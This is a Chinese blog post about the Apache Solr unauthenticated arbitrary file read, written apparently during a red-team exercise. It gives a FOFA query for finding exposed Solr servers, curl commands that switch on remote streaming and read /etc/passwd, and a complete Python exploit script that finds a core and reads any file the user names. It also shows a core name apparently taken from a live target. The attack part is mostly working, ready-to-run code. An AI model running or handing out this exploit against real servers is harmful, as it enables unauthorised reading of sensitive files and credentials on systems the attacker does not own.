这周在hw,水一篇文章,记录一下漏洞利用,当一个合格的脚本小子

0x01 漏洞描述

由于Apache Solr默认安装时未开启身份验证,导致未经身份验证的攻击者可利用Config API打开requestDispatcher.requestParsers.enableRemoteStreaming开关,从而使攻击者可以在未授权的情况下获取目标服务器敏感文件。

听说报给官方后,官方拒绝修复,认为这不是一个漏洞,比一些src还离谱,人家起码会给个内部已知:eyes:

0x02 漏洞影响

Apache Solr <= 8.8.1(全版本)

0x03 漏洞复现

fofa 语法:app="Solr"

image-20210318195353083

3.1 获取 core name,拼接url

http://xxx.xxx.xxx.xxx/solr/admin/cores?indexInfo=false&wt=json

image-20210318195317802

Core name为:arabnews,那么使用的url 为 http://xxx.xxx.xxx.xxx/solr/arabnews/config

1
curl -d '{  "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://xxx.xxx.xxx.xxx/solr/arabnews/config -H 'Content-type:application/json'

继续使用 core name 拼接 http://xxx.xxx.xxx.xxx/solr/arabnews/debug/dump?param=ContentStreams

1
curl "http://xxx.xxx.xxx.xxx/solr/arabnews/debug/dump?param=ContentStreams" -F "stream.url=file:///etc/passwd"

3.2 攻击

image-20210318200603145

0x04 漏洞POC

PeiQi文库的大佬已经写好了,我改了一点小毛病,读取完返回的值不一定是json,我复现的时候就遇到了这个问题,将json处理删掉了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : PeiQi

import requests
import sys
import random
import re
import base64
import time
from lxml import etree
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning

def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
print('+ \033[34m公众号 : PeiQi文库 \033[0m')
print('+ \033[34mVersion: Apache Solr < 8.2.0 \033[0m')
print('+ \033[36m使用格式: python3 CVE-2019-0193.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx:8983 \033[0m')
print('+ \033[36mFile >>> 文件名称或目录 \033[0m')
print('+------------------------------------------')

def POC_1(target_url):
core_url = target_url + "/solr/admin/cores?indexInfo=false&wt=json"
try:
response = requests.request("GET", url=core_url, timeout=10)
core_name = list(json.loads(response.text)["status"])[0]
print("\033[32m[o] 成功获得core_name,Url为:" + target_url + "/solr/" + core_name + "/config\033[0m")
return core_name
except:
print("\033[31m[x] 目标Url漏洞利用失败\033[0m")
sys.exit(0)

def POC_2(target_url, core_name):
vuln_url = target_url + "/solr/" + core_name + "/config"
headers = {
"Content-type":"application/json"
}
data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
print("\033[36m[o] 正在准备文件读取...... \033[0m".format(target_url))
if "responseHeader" in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {} 可能存在漏洞 \033[0m".format(target_url))
else:
print("\033[31m[x] 目标 {} 不存在漏洞\033[0m".format(target_url))
sys.exit(0)

except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)

def POC_3(target_url, core_name, File_name):
vuln_url = target_url + "/solr/{}/debug/dump?param=ContentStreams".format(core_name)
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = 'stream.url=file://{}'.format(File_name)
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
if "No such file or directory" in response.text:
print("\033[31m[x] 读取{}失败 \033[0m".format(File_name))
else:
print("\033[36m[o] 响应为:\n{} \033[0m".format(response.text))

except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)

if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
core_name = POC_1(target_url)
POC_2(target_url, core_name)
while True:
File_name = str(input("\033[35mFile >>> \033[0m"))
POC_3(target_url, core_name, File_name)

image-20210318204216768

0x04 参考

Apache Solr 任意文件读取漏洞 1Day